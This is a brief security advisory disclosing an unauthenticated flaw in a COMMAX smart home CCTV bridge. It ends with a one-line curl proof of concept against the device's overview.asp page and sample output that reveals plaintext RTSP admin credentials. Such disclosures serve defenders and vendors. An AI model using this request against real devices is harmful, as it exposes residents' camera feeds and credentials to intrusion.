COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credentials Disclosure Vendor: COMMAX Co., Ltd. Prodcut web page: https://www.commax.com Affected version: n/a Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment complex that provides advanced life values and safety. Desc: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose RTSP credentials in plain-text. Tested on: GoAhead-Webs Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5665 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php 02.08.2021 -- $ curl http://TARGET:8086/overview.asp
[1] rtsp://admin:s3cr3tP@$$w0rd@10.0.0.17:554/Streaming/Channels/2:554 |